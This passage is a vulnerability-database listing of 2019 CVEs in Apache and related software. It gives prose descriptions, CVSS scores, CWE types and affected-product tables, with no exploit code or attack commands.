Handling of the close_notify SSL/TLS message does not lead to a connection closure, leading the server to retain the socket opened and to have the client potentially receive clear text messages afterward. Mitigation: 2.0.20 users should migrate to 2.0.21, 2.1.0 users should migrate to 2.1.1. This issue affects: Apache MINA.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,

Products Affected

Vendor Product Version
apache mina 2.1.1
apache mina 2.0.20
CVE-2019-0232 HIGH

When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-0233 MEDIUM

An access permission override in Apache Struts 2.0.0 to 2.5.20 may cause a Denial of Service when performing a file upload.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-281,

Products Affected

Vendor Product Version
apache struts *
oracle communications_policy_management 12.5.0
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle financial_services_data_integration_hub 8.0.3
oracle mysql_enterprise_monitor *
oracle financial_services_data_integration_hub 8.0.6
CVE-2019-0234 MEDIUM

A Reflected Cross-site Scripting (XSS) vulnerability exists in Apache Roller. Roller's Math Comment Authenticator did not property sanitize user input and could be exploited to perform Reflected Cross Site Scripting (XSS). The mitigation for this vulnerability is to upgrade to the latest version of Roller, which is now Roller 5.2.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache roller 5.2.1
apache roller 5.2.2
apache roller 5.2.0
CVE-2019-0235 MEDIUM

Apache OFBiz 17.12.01 is vulnerable to some CSRF attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache ofbiz 17.12.01
CVE-2019-10070 MEDIUM

Apache Atlas versions 0.8.3 and 1.1.0 were found vulnerable to Stored Cross-Site Scripting in the search functionality

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache atlas 1.1.0
apache atlas 0.8.3
CVE-2019-10071 MEDIUM

The code which checks HMAC in form submissions used String.equals() for comparisons, which results in a timing side channel for the comparison of the HMAC signatures. This could lead to remote code execution if an attacker is able to determine the correct signature for their payload. The comparison should be done with a constant time algorithm instead.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2019-10072 MEDIUM

The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40 . By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2019-10073 MEDIUM

The "Blog", "Forum", "Contact Us" screens of the template "ecommerce" application bundled in Apache OFBiz are weak to Stored XSS attacks. Mitigation: Upgrade to 16.11.06 or manually apply the following commits on branch 16.11: 1858438, 1858543, 1860595 and 1860616

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-10074 HIGH

An RCE is possible by entering Freemarker markup in an Apache OFBiz Form Widget textarea field when encoding has been disabled on such a field. This was the case for the Customer Request "story" input in the Order Manager application. Encoding should not be disabled without good reason and never within a field that accepts user input. Mitigation: Upgrade to 16.11.06 or manually apply the following commit on branch 16.11: r1858533

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-74,CWE-116,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-10076 MEDIUM

A carefully crafted malicious attachment could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10077 MEDIUM

A carefully crafted InterWiki link could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10078 MEDIUM

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking. Initial reporting indicated ReferredPagesPlugin, but further analysis showed that multiple plugins were vulnerable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10079 MEDIUM

Apache Traffic Server is vulnerable to HTTP/2 setting flood attacks. Earlier versions of Apache Traffic Server didn't limit the number of setting frames sent from the client using the HTTP/2 protocol. Users should upgrade to Apache Traffic Server 7.1.7, 8.0.4, or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2019-10080 MEDIUM

The XMLFileLookupService in NiFi versions 1.3.0 to 1.9.2 allowed trusted users to inadvertently configure a potentially malicious XML file. The XML file has the ability to make external calls to services (via XXE) and reveal information such as the versions of Java, Jersey, and Apache that the NiFI instance uses.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache nifi *
CVE-2019-10081 MEDIUM

HTTP/2 (2.4.20 through 2.4.39) very early pushes, for example configured with "H2PushResource", could lead to an overwrite of memory in the pushing request's pool, leading to crashes. The memory copied is that of the configured push link header values, not data supplied by the client.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 9.0
debian debian_linux 10.0
CVE-2019-10082 MEDIUM

In Apache HTTP Server 2.4.18-2.4.39, using fuzzed network input, the http/2 session handling could be made to read memory after being freed, during connection shutdown.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server *
oracle instantis_enterprisetrack *
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
oracle enterprise_manager_ops_center 12.4.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle enterprise_manager_ops_center 12.3.3
oracle communications_element_manager 8.2.0
oracle communications_element_manager 8.0.0
oracle communications_element_manager 8.1.1
oracle retail_xstore_point_of_service 7.1
oracle communications_element_manager 8.1.0
CVE-2019-10083 MEDIUM

When updating a Process Group via the API in NiFi versions 1.3.0 to 1.9.2, the response to the request includes all of its contents (at the top most level, not recursively). The response included details about processors and controller services which the user may not have had read access to.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache nifi *
CVE-2019-10084 MEDIUM

In Apache Impala 2.7.0 to 3.2.0, an authenticated user with access to the IDs of active Impala queries or sessions can interact with those sessions or queries via a specially-constructed request and thereby potentially bypass authorization and audit mechanisms. Session and query IDs are unique and random, but have not been documented or consistently treated as sensitive secrets. Therefore they may be exposed in logs or interfaces. They were also not generated with a cryptographically secure random number generator, so are vulnerable to random number generator attacks that predict future IDs based on past IDs. Impala deployments with Apache Sentry or Apache Ranger authorization enabled may be vulnerable to privilege escalation if an authenticated attacker is able to hijack a session or query from another authenticated user with privileges not assigned to the attacker. Impala deployments with audit logging enabled may be vulnerable to incorrect audit logging as a user could undertake actions that were logged under the name of a different authenticated user. Constructing an attack requires a high degree of technical sophistication and access to the Impala system as an authenticated user.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-311,CWE-330,CWE-384,CWE-532,CWE-732,

Products Affected

Vendor Product Version
apache impala *
CVE-2019-10085 MEDIUM

In Apache Allura prior to 1.11.0, a vulnerability exists for stored XSS on the user dropdown selector when creating or editing tickets. The XSS executes when a user engages with that dropdown on that page.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache allura *
CVE-2019-10086 HIGH

In Apache Commons Beanutils 1.9.2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property available on all Java objects. We, however were not using this by default characteristic of the PropertyUtilsBean.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.3 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 3.9 3.4

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle retail_price_management 15.0
oracle weblogic_server 10.3.6.0.0
oracle jd_edwards_enterpriseone_orchestrator *
oracle communications_unified_inventory_management 7.4.0
oracle communications_billing_and_revenue_management_elastic_charging_engine 12.0.0.3
oracle utilities_framework 4.4.0.0.0
oracle fusion_middleware 12.2.1.4.0
oracle retail_central_office 14.1
oracle insurance_data_gateway 1.0.2.3
oracle agile_plm 9.3.3
oracle time_and_labor *
oracle service_bus 11.1.1.9.0
oracle communications_cloud_native_core_unified_data_repository 1.6.0
oracle retail_returns_management 14.1
oracle agile_product_lifecycle_management_integration_pack 3.6
oracle communications_unified_inventory_management 7.3.5
oracle peoplesoft_enterprise_pt_peopletools 8.57
oracle peoplesoft_enterprise_pt_peopletools 8.58
oracle retail_invoice_matching 16.0.3
oracle communications_billing_and_revenue_management 7.5
oracle retail_price_management 14.0
oracle communications_evolved_communications_application_server 7.1
oracle utilities_framework 4.2.0.2.0
fedoraproject fedora 30
oracle retail_back_office 14.1
oracle retail_price_management 16.0
oracle fusion_middleware 11.1.1.9
oracle service_bus 12.2.1.4.0
oracle hospitality_opera_5 5.5
redhat enterprise_linux_server 7.0
oracle communications_metasolv_solution 6.3.0
oracle communications_design_studio 7.3.5
oracle communications_cloud_native_core_policy 1.9.0
oracle retail_price_management 14.0.1
oracle communications_unified_inventory_management 7.3.4
oracle customer_management_and_segmentation_foundation 18.0
oracle communications_pricing_design_center 12.0.0.3.0
oracle communications_performance_intelligence_center 10.4.0.3
oracle flexcube_private_banking 12.0.0
oracle healthcare_foundation 7.1.5
opensuse leap 15.0
apache nifi 1.15.0
oracle utilities_framework 4.4.0.3.0
oracle enterprise_manager_for_virtualization 13.4.0.0
oracle peoplesoft_enterprise_pt_peopletools 8.56
oracle service_bus 12.2.1.3.0
apache nifi 1.14.0
redhat enterprise_linux_server_aus 7.7
fedoraproject fedora 31
oracle communications_billing_and_revenue_management_elastic_charging_engine 11.3.0.9
oracle jd_edwards_enterpriseone_orchestrator 9.2.5.3
oracle jd_edwards_enterpriseone_tools 9.2.5.3
oracle communications_convergence 3.0.2.2.0
oracle communications_metasolv_solution 6.3.1
oracle jd_edwards_enterpriseone_tools *
oracle retail_merchandising_system 5.0.3.1
oracle primavera_gateway *
oracle retail_xstore_point_of_service 18.0
oracle healthcare_foundation 7.2.2
oracle retail_xstore_point_of_service 16.0
oracle agile_product_lifecycle_management_integration_pack 3.5
oracle agile_plm 9.3.6
oracle utilities_framework 4.2.0.3.0
oracle hospitality_opera_5 5.6
oracle blockchain_platform *
oracle financial_services_revenue_management_and_billing_analytics 2.7
oracle peoplesoft_enterprise_peopletools 8.57
oracle retail_advanced_inventory_planning 14.1
apache commons_beanutils *
debian debian_linux 8.0
oracle application_testing_suite 13.3.0.1
oracle solaris_cluster 4.4
redhat enterprise_linux_server_tus 7.7
oracle banking_platform 2.9.0
oracle healthcare_foundation 8.0.1
oracle banking_platform 2.7.1
oracle flexcube_private_banking 12.1.0
oracle utilities_framework 4.4.0.2.0
oracle communications_design_studio 7.4.0
oracle retail_predictive_application_server 16.0
opensuse leap 15.1
oracle retail_xstore_point_of_service 17.0
oracle financial_services_revenue_management_and_billing_analytics 2.8
oracle healthcare_foundation 7.3.0
oracle communications_unified_inventory_management 7.4.1
oracle real-time_decisions_solutions 3.2.0.0
oracle utilities_framework *
oracle communications_cloud_native_core_console 1.4.0
oracle healthcare_foundation 7.3.1
oracle agile_plm 9.3.5
oracle retail_xstore_point_of_service 7.1
oracle retail_xstore_point_of_service 15.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.7
oracle communications_network_integrity 7.3.6
oracle communications_billing_and_revenue_management 12.0.0.3.0
oracle hospitality_reporting_and_analytics 9.1.0
redhat jboss_enterprise_application_platform 7.2.0
oracle peoplesoft_enterprise_peopletools 8.56
oracle fusion_middleware 12.2.1.3.0
oracle retail_point-of-service 14.1
oracle communications_design_studio 7.3.4
oracle banking_platform 2.4.0
CVE-2019-10087 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Page Revision History, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10088 MEDIUM

A carefully crafted or corrupt zip file can cause an OOM in Apache Tika's RecursiveParserWrapper in versions 1.7-1.21. Users should upgrade to 1.22 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache tika *
CVE-2019-10089 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the WYSIWYG editor, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10090 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the plain editor, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-10091 MEDIUM

When TLS is enabled with ssl-endpoint-identification-enabled set to true, Apache Geode fails to perform hostname verification of the entries in the certificate SAN during the SSL handshake. This could compromise intra-cluster communication using a man-in-the-middle attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N 2.2 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache geode 1.9.0
CVE-2019-10092 MEDIUM

In Apache HTTP Server 2.4.0-2.4.39, a limited cross-site scripting issue was reported affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 19.04
apache http_server *
netapp clustered_data_ontap *
canonical ubuntu_linux 18.04
opensuse leap 15.0
oracle secure_global_desktop 5.4
debian debian_linux 9.0
opensuse leap 15.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0
oracle enterprise_manager_ops_center 12.3.3
debian debian_linux 8.0
oracle communications_element_manager 8.2.0
oracle communications_element_manager 8.0.0
netapp clustered_data_ontap 9.6
oracle communications_element_manager 8.1.1
oracle secure_global_desktop 5.5
canonical ubuntu_linux 16.04
redhat software_collection 1.0
fedoraproject fedora 30
oracle communications_element_manager 8.1.0
CVE-2019-10093 MEDIUM

In Apache Tika 1.19 to 1.21, a carefully crafted 2003ml or 2006ml file could consume all available SAXParsers in the pool and lead to very long hangs. Apache Tika users should upgrade to 1.22 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache tika *
CVE-2019-10094 MEDIUM

A carefully crafted package/compressed file that, when unzipped/uncompressed yields the same file (a quine), causes a StackOverflowError in Apache Tika's RecursiveParserWrapper in versions 1.7-1.21. Apache Tika users should upgrade to 1.22 or later.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
apache tika *
CVE-2019-10095 HIGH

bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2019-10097 MEDIUM

In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the "PROXY" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-787,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle communications_session_route_manager 8.1.1
oracle http_server 12.2.1.4.0
oracle communications_session_report_manager 8.1.1
oracle enterprise_manager_ops_center 12.4.0
oracle enterprise_manager_ops_center 12.3.3
apache http_server 2.4.38
oracle communications_element_manager 8.2.0
oracle communications_element_manager 8.0.0
oracle communications_session_report_manager 8.2.1
oracle communications_element_manager 8.1.1
oracle communications_session_report_manager 8.2.0
apache http_server 2.4.35
apache http_server 2.4.33
oracle retail_xstore_point_of_service 7.1
apache http_server 2.4.34
oracle communications_element_manager 8.1.0
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
apache http_server 2.4.37
CVE-2019-10098 MEDIUM

In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,CWE-601,

Products Affected

Vendor Product Version
apache http_server *
CVE-2019-10099 MEDIUM

Prior to Spark 2.3.3, in certain situations Spark would write user data to local disk unencrypted, even if spark.io.encryption.enabled=true. This includes cached blocks that are fetched to disk (controlled by spark.maxRemoteBlockSizeFetchToMem); in SparkR, using parallelize; in Pyspark, using broadcast and parallelize; and use of python udfs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-312,

Products Affected

Vendor Product Version
apache spark *
CVE-2019-10172 MEDIUM

A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar CVE-2016-3720 also affects codehaus jackson-mapper-asl libraries but in different classes.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,CWE-611,

Products Affected

Vendor Product Version
fasterxml jackson-mapper-asl *
redhat jboss_enterprise_application_platform 7.0
apache spark 3.0.1
debian debian_linux 9.0
redhat jboss_fuse 7.0.0
debian debian_linux 8.0
CVE-2019-10241 MEDIUM

In Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client USES a specially formatted URL against the DefaultServlet or ResourceHandler that is configured for showing a Listing of directory contents.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
eclipse jetty 9.3.13
eclipse jetty 9.4.13
eclipse jetty 9.3.17
eclipse jetty 9.2.25
eclipse jetty 9.2.18
oracle rest_data_services 11.2.0.4
eclipse jetty 9.3.8
eclipse jetty 9.3.20
eclipse jetty 9.2.3
eclipse jetty 9.2.13
eclipse jetty 9.2.15
eclipse jetty 9.3.25
eclipse jetty 9.3.22
eclipse jetty 9.2.21
oracle retail_xstore_point_of_service 16.0
eclipse jetty 9.3.11
eclipse jetty 9.4.6
eclipse jetty 9.4.11
eclipse jetty 9.3.3
eclipse jetty 9.2.17
eclipse jetty 9.3.9
eclipse jetty 9.2.9
eclipse jetty 9.2.24
oracle flexcube_core_banking *
eclipse jetty 9.3.24
eclipse jetty 9.3.2
eclipse jetty 9.4.5
eclipse jetty 9.4.10
eclipse jetty 9.3.21
eclipse jetty 9.4.0
eclipse jetty 9.4.9
eclipse jetty 9.2.5
debian debian_linux 9.0
eclipse jetty 9.4.3
eclipse jetty 9.2.23
oracle rest_data_services 12.2.0.1
eclipse jetty 9.3.16
eclipse jetty 9.3.12
eclipse jetty 9.4.8
eclipse jetty 9.4.2
eclipse jetty 9.3.5
eclipse jetty 9.2.6
eclipse jetty 9.2.16
apache activemq 5.15.9
eclipse jetty 9.2.1
eclipse jetty 9.3.15
eclipse jetty 9.3.23
eclipse jetty 9.4.7
eclipse jetty 9.2.7
eclipse jetty 9.2.10
eclipse jetty 9.2.19
debian debian_linux 10.0
oracle retail_xstore_point_of_service 17.0
eclipse jetty 9.2.20
oracle rest_data_services 18c
eclipse jetty 9.2.0
eclipse jetty 9.3.18
eclipse jetty 9.2.12
eclipse jetty 9.2.11
eclipse jetty 9.3.6
oracle retail_xstore_point_of_service 7.1
eclipse jetty 9.3.0
eclipse jetty 9.3.4
eclipse jetty 9.3.14
oracle retail_xstore_point_of_service 15.0
oracle flexcube_core_banking 5.2.0
eclipse jetty 9.4.4
eclipse jetty 9.3.10
eclipse jetty 9.2.26
eclipse jetty 9.3.1
eclipse jetty 9.2.14
eclipse jetty 9.4.14
eclipse jetty 9.4.12
eclipse jetty 9.2.22
eclipse jetty 9.3.7
eclipse jetty 9.2.4
eclipse jetty 9.4.1
eclipse jetty 9.2.8
eclipse jetty 9.2.2
eclipse jetty 9.3.19
eclipse jetty 9.4.15
oracle rest_data_services 12.1.0.2
apache drill 1.16.0
CVE-2019-12397 MEDIUM

Policy import functionality in Apache Ranger 0.7.0 to 1.2.0 is vulnerable to a cross-site scripting issue. Upgrade to 2.0.0 or later version of Apache Ranger with the fix.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger *
CVE-2019-12398 LOW

In Apache Airflow before 1.10.5 when running with the "classic" UI, a malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views. The new "RBAC" UI is unaffected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-12399 MEDIUM

When Connect workers in Apache Kafka 2.0.0, 2.0.1, 2.1.0, 2.1.1, 2.2.0, 2.2.1, or 2.3.0 are configured with one or more config providers, and a connector is created/updated on that Connect cluster to use an externalized secret variable in a substring of a connector configuration property value, then any client can issue a request to the same Connect cluster to obtain the connector's task configuration and the response will contain the plaintext secret rather than the externalized secrets variables.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,

Products Affected

Vendor Product Version
oracle banking_liquidity_management *
oracle communications_cloud_native_core_policy 1.9.0
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_platform 2.7.0
oracle banking_supply_chain_finance *
oracle financial_services_analytical_applications_infrastructure *
oracle banking_credit_facilities_process_management 14.3.0
oracle banking_corporate_lending_process_management 14.4.0
apache kafka 2.2.1
oracle banking_payments 14.4.0
oracle blockchain_platform *
oracle banking_trade_finance_process_management 14.4.0
apache kafka 2.2.0
oracle banking_virtual_account_management 14.1.0
apache kafka 2.3.0
apache kafka 2.0.0
oracle banking_corporate_lending_process_management 14.1.0
oracle banking_trade_finance_process_management 14.1.0
apache kafka 2.0.1
oracle banking_virtual_account_management 14.4.0
oracle banking_credit_facilities_process_management 14.4.0
apache kafka 2.1.0
oracle banking_trade_finance_process_management 14.3.0
oracle banking_credit_facilities_process_management 14.1.0
oracle flexcube_universal_banking 14.4.0
apache kafka 2.1.1
oracle banking_virtual_account_management 14.3.0
CVE-2019-12400 LOW

In version 2.0.3 Apache Santuario XML Security for Java, a caching mechanism was introduced to speed up creating new XML documents using a static pool of DocumentBuilders. However, if some untrusted code can register a malicious implementation with the thread context class loader first, then this implementation might be cached and re-used by Apache Santuario - XML Security for Java, leading to potential security flaws when validating signed documents, etc. The vulnerability affects Apache Santuario - XML Security for Java 2.0.x releases from 2.0.3 and all 2.1.x releases before 2.1.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java *
oracle weblogic_server 14.1.1.0.0
